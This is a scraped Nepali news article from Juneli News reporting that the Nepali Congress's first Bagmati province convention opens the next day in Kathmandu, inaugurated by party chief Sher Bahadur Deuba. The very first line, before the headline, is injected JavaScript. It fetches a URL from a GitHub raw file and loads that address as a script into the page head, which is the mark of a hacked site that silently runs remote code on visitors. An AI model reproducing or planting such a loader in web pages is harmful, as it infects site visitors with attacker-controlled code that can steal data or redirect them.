;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौंमा कांग्रेस बागमती प्रदेशको प्रथम सम्मेलन भोलि – जुनेली न्युज
सोमवार, बैशाख २, २०८२
  • होमपेज
  • काठमाडौंमा कांग्रेस बागमती प्रदेशको प्रथम सम्मेलन भोलि
Breaking News

काठमाडौंमा कांग्रेस बागमती प्रदेशको प्रथम सम्मेलन भोलि


जुनेली न्यूज, काठमाडौं।

नेपाली कांग्रेसको प्रथम बागमती प्रदेश स्तरीय प्रथम सम्मेलन शनिबारदेखि काठमाडौंको सुकेधारा स्थित नवदुर्गा पार्टी प्यालेसमा हुने भएको छ ।

काठमाडौंमा शुक्रबार पत्रकार सम्मेलन गर्दै कांग्रेस बागमती प्रदेशका प्रवक्ता तिलक दुवाडीले शनिबारदेखि सुरु हुने सम्मेलनको उद्घाट्न पार्टी सभापति शेरबहादुर देउवाले गर्ने जानकारी दिनुभयो ।

दुई दिनसम्म चल्ने सम्मेलमा प्रदेशका सवै जिल्लाका प्रदेश प्रतिनिधिहरुको सहभागिता रहने छ । कांग्रेसले यसअघि लुम्बिनी, गण्डकी र मधेश प्रदेशको सम्मेलन गरिसकेको छ ।

सम्मेलनको पार्टी सभापति शेरबहादुर देउवाले शनिबार बिहान ८:३० बजे उद्घाटन गर्ने छन्।

कांग्रेसले यसअघि लुम्बिनी, गण्डकी र मधेस प्रदेशको प्रदेश सम्मेलन गरिसकेको छ।

फेसबुक प्रतिक्रियाहरु